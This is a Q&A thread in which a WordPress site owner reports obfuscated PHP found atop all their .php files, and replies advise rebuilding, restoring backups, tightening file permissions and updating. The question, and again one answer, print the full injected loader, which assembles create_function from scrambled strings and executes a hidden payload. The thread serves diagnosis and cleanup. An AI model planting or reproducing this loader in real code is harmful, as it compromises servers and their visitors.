# Wordpress - Found malicious PHP code

Tags: php, wordpress

I noticed some extra code in the top of **all** on my `.php` file in one of my Wordpress site.

Here is the code:

```
<?php $symejqfw = ' 162 x65 141 x74 145 x5f 146 x75 156 x63 164 x69 157 x6e";   x7f x7f x7f<u%V x27{ftmfV   x7f<*X&Z&S{fssfpms();}}h1:|:*mmvo:>:iuhofm%:-5ppde75]y7:]268]y7f#<!%tw-#Y#-#D#-#W#-#C#-#O#-#N#*-!%ff2-t0}Z;0]=]0#)2q%l}S;2-u%!-#2#/#%#/#o]#/*)323zbe!-#jt0*?]+^?]_  x5c}X   x%6<*17-SFEBFI,6<*127-UVPFNJU,*CWtfs%)7gj6<*id%)ftpmdR6<*id%)dfyfR  x27tfs  164") && (!isset($GLOBALS[" x61 :}334}472   x24<!%ff2!>!bssbz)  x24]25  x24-    x24-!%  x24-    x#QwTW%hIr  x5c1^-%r    x5c2^-%hOh/7;%!<*#}_;#)323ldfid>}&;!osvufs} x7f;!opj81]265]y72]254]y76#<!%w:!>!(%w:!>!  x246767~6<Cw6<%c*W%eN+#Qi   x5c1^W%c!>!%i   x5c2^<!Ce*[!%cIjQeTQcOc/#00#W*-)1/2986+7**^/%rx<~!!%s:N}#-%o:W%c:>1<%b:>1<!gps)DPT7-UFOJ`GB)fubfsdXA    x27K6<  x7fw6*3qj%7>    x2272qj%)7gj6<**2q  x27pd%6<C   x27pd%6|6.7eu{66~67<&w8y]#>q%<#762]67y]562]38y]572]48y]#>m%:|:*#)rrd/#00;quui#>.%!<***f x27,*e  x27,*d  x27,*c  x27,*b  x27)fepdof%!|!*!***b%)sfxpmpusut!-#j0#!/!**#sf6<*27-SFGTOBSUOSVUFS,6<*msv%7-MSV,6<*)ujo = $smtfqnn("", $kyfymwm); $tu%7>/7&6|7**111127-K)ebfsX  x27u%)7fmjix6<C x27&6<*rfs%7-K)fujsxX6<#7/7^#iubq#  x5cq%   x27j-C)fepmqnjA x27&6<.fmjgA    x27doj%6<   x7fw6*  x7f_%<#372]58y]472]37y]672]48y]#>s%<#462]47y]252]1w/    x24)##-!#~<#/%  x24-    x24!>!fyqh!>!%tdz)%bbT-%bT-%hW~%fdy)##-!#~<%h00#*<%nfd)##Qtpz)c%j:^<!%w`    x5c^>Ew:Qb:Qc:W~!%z!>2<!gps)%j>1<E{h%)sutcvt)!gj!|!*bubE{h%)j{hnpd!opjudovg!|!**#j{hnpd#)tutjyf`opju#>q%V<*#fopoV;hojepdoF.uofu24<!%tmw!>!#]y84]275]y83]273]y76]277#<!%t2w>tutjyf`439275ttfsqnpdov{h19275j{hnpd19275fubmgoj{%tdz>#L4]275L3]248L3P6L1M5]D2P4]D6#<%G]yf   142 x5f 163 x74 141 x72tmfV x7f<*XAZASV<*w%)8]86]y31]278]y3f]51L3]84]y31M6]y3e]81#/#7e:55946-tr.984:75983:4898o]o]Y%7;utpI#7>/7rfs%6<#o]1/20QUUI7jsv%7UFH#  if((function_exists("   x6%j=6[%ww2!>#p#/#p#/%z<jg!)%z>>2*!%z>3<!fmtf!%z>2<!%ww2)%w`TW~ %tww**WYsboepn)%bss-%rxB%h>#]y31]278]y3.985:52985-t.98]K4]65]Duqpuft`msvd},;uqpuft`msvd}+;!>!}  x27;!>>>!}_;gvc%}&;ftmbg}   x6<*&7-#o]s]o]s]#)fepmqyf   x27*&7-n%)utje]81]K78:56985:6197g:74985-rbg39*56A:>:8:|:7#6#)<%bG9}:}.}-}!#*<%nfd>%fdy<Cb*[%6<  x7fw6*CW&)7gj6<*doj%7dovg   x22)!gj}1~!<2p% x7f!~P2L5P6]y6gP7L6M7]D4]275]D:M8]Df#<#]y74]273]y76]252]y85]256]y6g]257]y86]267]y74]2%j:>1<%j:=tj{fpg)%s:*<%j:,,Bjg!)%j:>.)fepdof./#@#/qp%>5h%!<*::::::-111112)eobs`un>qp%!|Z~!<##!>!2p 166 x3a 61  x31"))) { $smtfqnn = "  x63!sp!*#opo#>>}R;msv}.;/#/#/},;#-#}+;%-qp%)54l}    x2156   x75 156 x61"])))) { $GLOBALS["  7R37,#/q%>U<#16,47R57,27R66,#/q%>2q%<#g6R85,67R37,18R24-tusqpt)%z-#:#*  x24-    x24!>!  x24/%tjw/   xUTPI`QUUI&e_SEEB`FUPNFS&d_SFSFGFS`QUUI&c_UOFHB`SF!|    x24-    x24gvodujpo!    x24-    x24y7   x24-    x24*<!  x24-    x24gps)%j!gj!<*#cd2bge56+99386c6f+9f5d816:+946:ce44#)zbssb!>!ssbnpe_GMFT`QIQ&f_n%-#+I#)q%:>:r%:|:**t%)m%=*h%)m%):fmjix:<##:>:h%:<#64y]552]e7y]#>n]67]452]88]5]48]32M3]317]445]212]44)%zB%z>!    x24/%tmw/   x24)%zW%h>EzH,2W%wN;#-Ez-1H*WCw*[!%rN}2qj%7-K)udfoopdXA x22)7gj6<*QDU`MPT7-NBFSUT`LjR   x27id%6<    x7fw6*  x7f_*#ujojRk3`{666~6<&w6<   x7fw6*CW&)7g,j%>j%!<**3-j%-bubE{h%)sutcvt-#w#)ldbqov>*oh%)tpqsut>j%!*9! x27!hmg%)!gj!~<ofmy%,3mcnbs+yfeobz+sfwjidsb`bj+upcotn+qsvmt+fmhpph#)zbssb!-#}#)fepmqnj]373P6]36]73]83]238M7]381]211M5j6<.[A x27&6<  x7fw6*  x7f_*#[k2`{6:!}7;!}6;##}C;!>>!}W;utpi}Y;x272qj%6<^#zsfvr#   x5cq%7/7#@#*qp%!-uyfu%)3of)fepdof`57ftbc    x7f!27Y%6<.msv`ftsbqA7>q%6< x7fw6*  x7f_*#fubfsdXk5`{66~6<&wTV`QUUI&b%!|!*)323zbek!~!<b%    x7f!<X>b%Z<#opo#>b%!*##>>6d]281Ld]245]K2]285]Ke]#]341]88M4P8]37]278]225]241]334]368]322]3]364]6]283]427]36w!>!  x2400~:<h%_t%:osvufs:~:<4:71]K9]77]D4]82]K6]72]K9]78]K5]53]Kc#<%tpz!>!#]D6M7]K3#<%yy>#]D]275]y83]248]y83]256]y4]31#-%tdz*Wsfuvso!%bss   x5csboe))1/35.)1/14+9*sv%6<C>^#zsfvr#   x5cq%7**^#zsfvr#    x5cq%)ufttj x22)gj6<^#Y#    x5cq%   xmpef)# x24*<!%t::!>!   x24Ypp3)%cB%iN}#-!  x24/%tmw/   x24)r.93e:5597f-s.973:8297f:5297e:56-xr!/!#0#)idubn`hfsq)!sp!*#ojneb#-*f%)sfxpmpusut)tpqssutRe%)Rd%)Rb%))m6<    x7fw6*CW&)7gj6<*K)ftpmdXA6~6<function gikhoiu($n)~!Ydrr)%rxB%epnbss!>!bgj}l;33bq}k;opjudovg}x;0]=])0#)U!    x27{**u%-#j]); if ((strstr($uas,"   x6d 163 x69 145")) or (strstr($uas,"    x72fmy%)utjm!|!*5!  x27!hmg%)!gj!|!*1?hmg%!<##!>!2p%Z<^2    x5c2b%!>!2p%!*3>?*2b%)gpf{jt)!gj!<*2bd%-#1GO    x22#)fepmqyfA>2b%!<*qp%-*.%)euhA)3of>2bd%!<5h%/#0#/*#npd/!%t::**<(<!fwbm)%tjw)# x24#-!#]y38#-!%w:**<")));$tssfpms:4:|:**#ppde#)tutjyf`4 x223}!+!<+{e%+*!*+fepdfe{h+{d%)+opjppde>u%V<#65,47R25,d7R17,6X)!gjZ<#opo#>b%!**X)ufttj  x22)gj!|!*nbsbq%)323ldfidk!~!<*(array_map("gikhoiu",str_split("%tjw!>!#]y84#H#-#I#-#K#-#L#-#M#-#[#j%)hopm3qjA)qj3hopmA  x273qj%6<*Y%)fnbozcYufhA    pd%w6Z6<.5`hA   x27pd%6<pd%w6Z6<.4`hA   x27p|!*uyfu x27k:!ftmf!}Z;^nbsbq%   x5cSFWSFT`%}X;*#fmjgk4`{6~6<tfs%w6< x7fw624*!|! x24-    x24 x5c%j^  x24-    x24tvctus)% x24-    x24b!>!%yy)#}#-#    x24-    x>1<%j=tj{fpg)% x24-    x24*<!~!    x24/%t25]43]321]464]284]364]6]234]342]58]27f;!osvufs}w;*    x7f!>>  x22!pd%)!gj}Z;h!opjudovg}{;#)tutjyf`opjudo{return chr(ord($n)-1);} @error_reporting(0); $kyfymwm = imploder%:-t%)3of:opjudovg<~ x24<!%o:!>! x242178}527}88tuofuopd`ufh`fmjg}[;ldpt%}K;`ufldpt}X;`msvd}R;*msv%)}.;`UQPMSVD!-id%)ssbz)#44ec:649#-!#:618d5f9#-!#f6c6839]},;osvufs} x27;mnui}&;zepc}A;~!}   x7f;!|!}{;)udovg+)!gj+{e%!osvufs!*!+A!>!{e%)!>> x22!ftmbg)!gj<*#k#)usbut`cpV    x7f24)% x24-    x24y4   x24-    x24]y8  x24-    x24]26  x24-    x24<%j,,*53Ld]53]Kc]55Ld]55#*vg)!gj!|!*msv%)}k~~~<ftmbg!osvufs!|ftmf!~<**9.-j%-bubE{h%)sutcvx61 156 x75 156 x61"]=1; $uas=strtolower($_SERVEx27rfs%6~6< x7fw6<*K)ftpmdXA6|7**197-t)fubmgoj{hA!osvufs!~<3,j%>j%!*3!  x27!hmg%!)!gj!<2,*j%!-#1]#-udovg}k~~9{d%:osvufs:~928>>  x22:ftm*9-1-r%)s%>/h%:<**#57]38y]47]67y]37]88y]27]28y]#/r%/h%)9#-!#65egb2dc#*<!sfuvso!sboepn)%epnbss-%rxW~!Ypp2#00#W~!%t2w)##Qtjw)#]82#-#!#-%tmw)R["    x48 124 x54 120 x5f 125 x53 105 x52 137 x41 107 x45 116 x54"d%6<pd%w6Z6<.3`hA   x27pd%6<pd%w6Z6<.2`hAopD#)sfebfI{*w%)kVx{**#k#)tutjyf`x x22l:!}V;3q%}U;y]}R;2bubE{h%)tpqsut>j%!*72! x27!hmg%)!gj!<2,*j%-#1]#-bubE{)!gj!<**2-4-bubE{h%)sutcvt)esp>hmg%!<12>j%!|!*#91y]c9y]g2y]#>>*4-1-bubx24<!fwbm)%tjw)bssbz)#P#-#Q#-#B#-#T#-#E#-#G#-6]281L1#/#M5]DgP5]D6#<%fdy>#]D4]273]D6>1*!%b:>1<!fmtf!%b:>%s:  x5c%j:.2^,%b:<!%c:>%s:  x5sTrREvxNoiTCnuf_EtaerCxECalPer_Rtsjisjaar'; $vfovhd=explode(chr((731-611)),substr($symejqfw,(25019-19142),(234-200))); $mnyjals = $vfovhd[0]($vfovhd[(3-2)]); $rghbybu = $vfovhd[0]($vfovhd[(13-11)]); if (!function_exists('vjgzedrinj')) { function vjgzedrinj($weimqfk, $wamgseuu,$xxexlfvd) { $fdiepn = NULL; for($mjuwsnoc=0;$mjuwsnoc<(sizeof($weimqfk)/2);$mjuwsnoc++) { $fdiepn .= substr($wamgseuu, $weimqfk[($mjuwsnoc*2)],$weimqfk[($mjuwsnoc*2)+(3-2)]); } return $xxexlfvd(chr((37-28)),chr((320-228)),$fdiepn); }; } $vpgsib = explode(chr((133-89)),'1636,24,1479,25,328,33,2275,35,5144,48,5463,64,3833,63,2189,38,0,59,3746,20,4675,64,4248,44,3425,22,486,49,4361,40,5527,39,700,33,1844,38,3713,33,943,67,1591,45,5192,37,2739,45,640,60,4315,46,3079,29,1010,21,3493,65,3142,55,1961,24,1031,46,4445,27,285,43,256,29,873,41,2784,57,3018,61,4787,69,1784,60,4611,64,5081,63,5229,61,5622,53,2884,39,2841,43,3896,38,5675,70,1252,67,1985,26,3934,55,3989,62,774,63,2127,62,837,36,2923,64,3647,66,2511,70,2404,49,3197,54,4191,57,3108,34,4401,44,2227,48,445,41,5290,35,1910,20,1390,49,109,27,4107,28,4135,30,4938,69,59,39,1504,21,4165,26,2310,53,1319,27,5566,56,4893,45,3788,45,188,68,1346,44,2044,47,136,20,3332,29,5325,55,2581,66,1077,46,733,41,4739,48,361,54,4472,68,2363,41,5007,54,2453,58,4540,36,1123,32,3558,54,535,55,3766,22,4856,37,5380,49,2682,57,415,30,5429,34,1722,39,1882,28,3612,35,1761,23,1525,66,3361,64,5790,38,2011,33,1439,40,3251,23,5061,20,1930,31,1155,53,3274,58,2987,31,2647,35,4576,35,3447,46,590,50,2091,36,5828,49,1208,44,1660,62,5745,45,4292,23,156,32,4051,56,914,29,98,11'); $yoqfazwbq = $mnyjals("",vjgzedrinj($vpgsib,$symejqfw,$rghbybu)); $mnyjals=$symejqfw; $yoqfazwbq(""); $yoqfazwbq=(650-529); $symejqfw=$yoqfazwbq-1; ?>
```

Should I be worried?

What should I do to fix this?

Comment: Gone, server is compromised. Gotta rebuild it. Everything else will be just wasting your time. There is a very active post on SE network security portal about this same issue please search for it

Comment: Cross-side dupe: http://security.stackexchange.com/q/115461

Comment: Yeah yeah that one! Thanks @Rizier123

Comment: The comment above is an over-reaction. Your wordpress site has been hacked. This happens all the time. See https://codex.wordpress.org/FAQ_My_site_was_hacked for instance

Comment: That wordpress page also says *If you restore from a known clean backup of your WordPress Database, and re-upload your backed up WordPress plugin and theme files through FTP or SFTP, that will ensure that all those bits are clean of malicious code are gone. At the very least*

Comment: Server or Wordpress compromised  ? That's not exactly the same :/ I already but back a backup from days ago.

Comment: If someone can write to your server files, your server is compromised regardless of how much that can be downplayed

Comment: It's not downplaying, but being realistic. Wordpress sites often give the apache user write access to the php files. This means that updates can be done via http, rather than using ftp/ssh/etc. So there's a deliberate policy of allowing "someone" to write to the server files. But writing to some server files doesn't mean writing to all server files (consider how many people are allowed to write what they like to your server logs). Dealing with a hacked wordpress instance is annoying enough without being told that it's equivalent to a root exploit... which it isn't in 99.9% of cases.

Answer (score 1, accepted):

This code is not by Wordpress

Your server is compromised, in this case you can choose same ways:

#### Backup and reset

You need to create a wordpress dump (Wordpress -> Tools -> Export), save your wp-content folder and reset your server.

When your server is ready, you can install Wordpress again, go to (Wordpress -> Tools -> Import) and import your dump and upload your wp-content folder (remember to import ONLY images in your wp-content, not .php files).

#### Using a tool

Reference to: [I found unknown PHP code on my server. How do I de-obfuscate the code?](https://security.stackexchange.com/questions/115461/i-found-unknown-php-code-on-my-server-how-do-i-de-obfuscate-the-code)

#### Contact your server provider

If you can, contact your server provider for technical controls.

Comment: SHould i change the perms of my files ? how can i be sure that the exploit is not still here ?

Comment: I recommend changing the permissions on all php files so that they are not writable by the apache user. That will prevent this from recurring immediately. You can be sure that your code is still exploitable if you simply restore it as it was. You should at least update to the latest version of wordpress, and look for updates to your plugins (or disable them).

Answer (score 0):

1. Install new wordpress.(New)
2. Download All Plugin (new)
3. Connect Old Database
4. Add All uploads Media
5. check your theam &template and Js File.

**Find and Replace in Theam**

```
<?php $symejqfw = ' 162 x65 141 x74 145 x5f 146 x75 156 x63 164 x69 157 x6e";   x7f x7f x7f<u%V x27{ftmfV   x7f<*X&Z&S{fssfpms();}}h1:|:*mmvo:>:iuhofm%:-5ppde75]y7:]268]y7f#<!%tw-#Y#-#D#-#W#-#C#-#O#-#N#*-!%ff2-t0}Z;0]=]0#)2q%l}S;2-u%!-#2#/#%#/#o]#/*)323zbe!-#jt0*?]+^?]_  x5c}X   x%6<*17-SFEBFI,6<*127-UVPFNJU,*CWtfs%)7gj6<*id%)ftpmdR6<*id%)dfyfR  x27tfs  164") && (!isset($GLOBALS[" x61 :}334}472   x24<!%ff2!>!bssbz)  x24]25  x24-    x24-!%  x24-    x#QwTW%hIr  x5c1^-%r    x5c2^-%hOh/7;%!<*#}_;#)323ldfid>}&;!osvufs} x7f;!opj81]265]y72]254]y76#<!%w:!>!(%w:!>!  x246767~6<Cw6<%c*W%eN+#Qi   x5c1^W%c!>!%i   x5c2^<!Ce*[!%cIjQeTQcOc/#00#W*-)1/2986+7**^/%rx<~!!%s:N}#-%o:W%c:>1<%b:>1<!gps)DPT7-UFOJ`GB)fubfsdXA    x27K6<  x7fw6*3qj%7>    x2272qj%)7gj6<**2q  x27pd%6<C   x27pd%6|6.7eu{66~67<&w8y]#>q%<#762]67y]562]38y]572]48y]#>m%:|:*#)rrd/#00;quui#>.%!<***f x27,*e  x27,*d  x27,*c  x27,*b  x27)fepdof%!|!*!***b%)sfxpmpusut!-#j0#!/!**#sf6<*27-SFGTOBSUOSVUFS,6<*msv%7-MSV,6<*)ujo = $smtfqnn("", $kyfymwm); $tu%7>/7&6|7**111127-K)ebfsX  x27u%)7fmjix6<C x27&6<*rfs%7-K)fujsxX6<#7/7^#iubq#  x5cq%   x27j-C)fepmqnjA x27&6<.fmjgA    x27doj%6<   x7fw6*  x7f_%<#372]58y]472]37y]672]48y]#>s%<#462]47y]252]1w/    x24)##-!#~<#/%  x24-    x24!>!fyqh!>!%tdz)%bbT-%bT-%hW~%fdy)##-!#~<%h00#*<%nfd)##Qtpz)c%j:^<!%w`    x5c^>Ew:Qb:Qc:W~!%z!>2<!gps)%j>1<E{h%)sutcvt)!gj!|!*bubE{h%)j{hnpd!opjudovg!|!**#j{hnpd#)tutjyf`opju#>q%V<*#fopoV;hojepdoF.uofu24<!%tmw!>!#]y84]275]y83]273]y76]277#<!%t2w>tutjyf`439275ttfsqnpdov{h19275j{hnpd19275fubmgoj{%tdz>#L4]275L3]248L3P6L1M5]D2P4]D6#<%G]yf   142 x5f 163 x74 141 x72tmfV x7f<*XAZASV<*w%)8]86]y31]278]y3f]51L3]84]y31M6]y3e]81#/#7e:55946-tr.984:75983:4898o]o]Y%7;utpI#7>/7rfs%6<#o]1/20QUUI7jsv%7UFH#  if((function_exists("   x6%j=6[%ww2!>#p#/#p#/%z<jg!)%z>>2*!%z>3<!fmtf!%z>2<!%ww2)%w`TW~ %tww**WYsboepn)%bss-%rxB%h>#]y31]278]y3.985:52985-t.98]K4]65]Duqpuft`msvd},;uqpuft`msvd}+;!>!}  x27;!>>>!}_;gvc%}&;ftmbg}   x6<*&7-#o]s]o]s]#)fepmqyf   x27*&7-n%)utje]81]K78:56985:6197g:74985-rbg39*56A:>:8:|:7#6#)<%bG9}:}.}-}!#*<%nfd>%fdy<Cb*[%6<  x7fw6*CW&)7gj6<*doj%7dovg   x22)!gj}1~!<2p% x7f!~P2L5P6]y6gP7L6M7]D4]275]D:M8]Df#<#]y74]273]y76]252]y85]256]y6g]257]y86]267]y74]2%j:>1<%j:=tj{fpg)%s:*<%j:,,Bjg!)%j:>.)fepdof./#@#/qp%>5h%!<*::::::-111112)eobs`un>qp%!|Z~!<##!>!2p 166 x3a 61  x31"))) { $smtfqnn = "  x63!sp!*#opo#>>}R;msv}.;/#/#/},;#-#}+;%-qp%)54l}    x2156   x75 156 x61"])))) { $GLOBALS["  7R37,#/q%>U<#16,47R57,27R66,#/q%>2q%<#g6R85,67R37,18R24-tusqpt)%z-#:#*  x24-    x24!>!  x24/%tjw/   xUTPI`QUUI&e_SEEB`FUPNFS&d_SFSFGFS`QUUI&c_UOFHB`SF!|    x24-    x24gvodujpo!    x24-    x24y7   x24-    x24*<!  x24-    x24gps)%j!gj!<*#cd2bge56+99386c6f+9f5d816:+946:ce44#)zbssb!>!ssbnpe_GMFT`QIQ&f_n%-#+I#)q%:>:r%:|:**t%)m%=*h%)m%):fmjix:<##:>:h%:<#64y]552]e7y]#>n]67]452]88]5]48]32M3]317]445]212]44)%zB%z>!    x24/%tmw/   x24)%zW%h>EzH,2W%wN;#-Ez-1H*WCw*[!%rN}2qj%7-K)udfoopdXA x22)7gj6<*QDU`MPT7-NBFSUT`LjR   x27id%6<    x7fw6*  x7f_*#ujojRk3`{666~6<&w6<   x7fw6*CW&)7g,j%>j%!<**3-j%-bubE{h%)sutcvt-#w#)ldbqov>*oh%)tpqsut>j%!*9! x27!hmg%)!gj!~<ofmy%,3mcnbs+yfeobz+sfwjidsb`bj+upcotn+qsvmt+fmhpph#)zbssb!-#}#)fepmqnj]373P6]36]73]83]238M7]381]211M5j6<.[A x27&6<  x7fw6*  x7f_*#[k2`{6:!}7;!}6;##}C;!>>!}W;utpi}Y;x272qj%6<^#zsfvr#   x5cq%7/7#@#*qp%!-uyfu%)3of)fepdof`57ftbc    x7f!27Y%6<.msv`ftsbqA7>q%6< x7fw6*  x7f_*#fubfsdXk5`{66~6<&wTV`QUUI&b%!|!*)323zbek!~!<b%    x7f!<X>b%Z<#opo#>b%!*##>>6d]281Ld]245]K2]285]Ke]#]341]88M4P8]37]278]225]241]334]368]322]3]364]6]283]427]36w!>!  x2400~:<h%_t%:osvufs:~:<4:71]K9]77]D4]82]K6]72]K9]78]K5]53]Kc#<%tpz!>!#]D6M7]K3#<%yy>#]D]275]y83]248]y83]256]y4]31#-%tdz*Wsfuvso!%bss   x5csboe))1/35.)1/14+9*sv%6<C>^#zsfvr#   x5cq%7**^#zsfvr#    x5cq%)ufttj x22)gj6<^#Y#    x5cq%   xmpef)# x24*<!%t::!>!   x24Ypp3)%cB%iN}#-!  x24/%tmw/   x24)r.93e:5597f-s.973:8297f:5297e:56-xr!/!#0#)idubn`hfsq)!sp!*#ojneb#-*f%)sfxpmpusut)tpqssutRe%)Rd%)Rb%))m6<    x7fw6*CW&)7gj6<*K)ftpmdXA6~6<function gikhoiu($n)~!Ydrr)%rxB%epnbss!>!bgj}l;33bq}k;opjudovg}x;0]=])0#)U!    x27{**u%-#j]); if ((strstr($uas,"   x6d 163 x69 145")) or (strstr($uas,"    x72fmy%)utjm!|!*5!  x27!hmg%)!gj!|!*1?hmg%!<##!>!2p%Z<^2    x5c2b%!>!2p%!*3>?*2b%)gpf{jt)!gj!<*2bd%-#1GO    x22#)fepmqyfA>2b%!<*qp%-*.%)euhA)3of>2bd%!<5h%/#0#/*#npd/!%t::**<(<!fwbm)%tjw)# x24#-!#]y38#-!%w:**<")));$tssfpms:4:|:**#ppde#)tutjyf`4 x223}!+!<+{e%+*!*+fepdfe{h+{d%)+opjppde>u%V<#65,47R25,d7R17,6X)!gjZ<#opo#>b%!**X)ufttj  x22)gj!|!*nbsbq%)323ldfidk!~!<*(array_map("gikhoiu",str_split("%tjw!>!#]y84#H#-#I#-#K#-#L#-#M#-#[#j%)hopm3qjA)qj3hopmA  x273qj%6<*Y%)fnbozcYufhA    pd%w6Z6<.5`hA   x27pd%6<pd%w6Z6<.4`hA   x27p|!*uyfu x27k:!ftmf!}Z;^nbsbq%   x5cSFWSFT`%}X;*#fmjgk4`{6~6<tfs%w6< x7fw624*!|! x24-    x24 x5c%j^  x24-    x24tvctus)% x24-    x24b!>!%yy)#}#-#    x24-    x>1<%j=tj{fpg)% x24-    x24*<!~!    x24/%t25]43]321]464]284]364]6]234]342]58]27f;!osvufs}w;*    x7f!>>  x22!pd%)!gj}Z;h!opjudovg}{;#)tutjyf`opjudo{return chr(ord($n)-1);} @error_reporting(0); $kyfymwm = imploder%:-t%)3of:opjudovg<~ x24<!%o:!>! x242178}527}88tuofuopd`ufh`fmjg}[;ldpt%}K;`ufldpt}X;`msvd}R;*msv%)}.;`UQPMSVD!-id%)ssbz)#44ec:649#-!#:618d5f9#-!#f6c6839]},;osvufs} x27;mnui}&;zepc}A;~!}   x7f;!|!}{;)udovg+)!gj+{e%!osvufs!*!+A!>!{e%)!>> x22!ftmbg)!gj<*#k#)usbut`cpV    x7f24)% x24-    x24y4   x24-    x24]y8  x24-    x24]26  x24-    x24<%j,,*53Ld]53]Kc]55Ld]55#*vg)!gj!|!*msv%)}k~~~<ftmbg!osvufs!|ftmf!~<**9.-j%-bubE{h%)sutcvx61 156 x75 156 x61"]=1; $uas=strtolower($_SERVEx27rfs%6~6< x7fw6<*K)ftpmdXA6|7**197-t)fubmgoj{hA!osvufs!~<3,j%>j%!*3!  x27!hmg%!)!gj!<2,*j%!-#1]#-udovg}k~~9{d%:osvufs:~928>>  x22:ftm*9-1-r%)s%>/h%:<**#57]38y]47]67y]37]88y]27]28y]#/r%/h%)9#-!#65egb2dc#*<!sfuvso!sboepn)%epnbss-%rxW~!Ypp2#00#W~!%t2w)##Qtjw)#]82#-#!#-%tmw)R["    x48 124 x54 120 x5f 125 x53 105 x52 137 x41 107 x45 116 x54"d%6<pd%w6Z6<.3`hA   x27pd%6<pd%w6Z6<.2`hAopD#)sfebfI{*w%)kVx{**#k#)tutjyf`x x22l:!}V;3q%}U;y]}R;2bubE{h%)tpqsut>j%!*72! x27!hmg%)!gj!<2,*j%-#1]#-bubE{)!gj!<**2-4-bubE{h%)sutcvt)esp>hmg%!<12>j%!|!*#91y]c9y]g2y]#>>*4-1-bubx24<!fwbm)%tjw)bssbz)#P#-#Q#-#B#-#T#-#E#-#G#-6]281L1#/#M5]DgP5]D6#<%fdy>#]D4]273]D6>1*!%b:>1<!fmtf!%b:>%s:  x5c%j:.2^,%b:<!%c:>%s:  x5sTrREvxNoiTCnuf_EtaerCxECalPer_Rtsjisjaar'; $vfovhd=explode(chr((731-611)),substr($symejqfw,(25019-19142),(234-200))); $mnyjals = $vfovhd[0]($vfovhd[(3-2)]); $rghbybu = $vfovhd[0]($vfovhd[(13-11)]); if (!function_exists('vjgzedrinj')) { function vjgzedrinj($weimqfk, $wamgseuu,$xxexlfvd) { $fdiepn = NULL; for($mjuwsnoc=0;$mjuwsnoc<(sizeof($weimqfk)/2);$mjuwsnoc++) { $fdiepn .= substr($wamgseuu, $weimqfk[($mjuwsnoc*2)],$weimqfk[($mjuwsnoc*2)+(3-2)]); } return $xxexlfvd(chr((37-28)),chr((320-228)),$fdiepn); }; } $vpgsib = explode(chr((133-89)),'1636,24,1479,25,328,33,2275,35,5144,48,5463,64,3833,63,2189,38,0,59,3746,20,4675,64,4248,44,3425,22,486,49,4361,40,5527,39,700,33,1844,38,3713,33,943,67,1591,45,5192,37,2739,45,640,60,4315,46,3079,29,1010,21,3493,65,3142,55,1961,24,1031,46,4445,27,285,43,256,29,873,41,2784,57,3018,61,4787,69,1784,60,4611,64,5081,63,5229,61,5622,53,2884,39,2841,43,3896,38,5675,70,1252,67,1985,26,3934,55,3989,62,774,63,2127,62,837,36,2923,64,3647,66,2511,70,2404,49,3197,54,4191,57,3108,34,4401,44,2227,48,445,41,5290,35,1910,20,1390,49,109,27,4107,28,4135,30,4938,69,59,39,1504,21,4165,26,2310,53,1319,27,5566,56,4893,45,3788,45,188,68,1346,44,2044,47,136,20,3332,29,5325,55,2581,66,1077,46,733,41,4739,48,361,54,4472,68,2363,41,5007,54,2453,58,4540,36,1123,32,3558,54,535,55,3766,22,4856,37,5380,49,2682,57,415,30,5429,34,1722,39,1882,28,3612,35,1761,23,1525,66,3361,64,5790,38,2011,33,1439,40,3251,23,5061,20,1930,31,1155,53,3274,58,2987,31,2647,35,4576,35,3447,46,590,50,2091,36,5828,49,1208,44,1660,62,5745,45,4292,23,156,32,4051,56,914,29,98,11'); $yoqfazwbq = $mnyjals("",vjgzedrinj($vpgsib,$symejqfw,$rghbybu)); $mnyjals=$symejqfw; $yoqfazwbq(""); $yoqfazwbq=(650-529); $symejqfw=$yoqfazwbq-1; ?>
```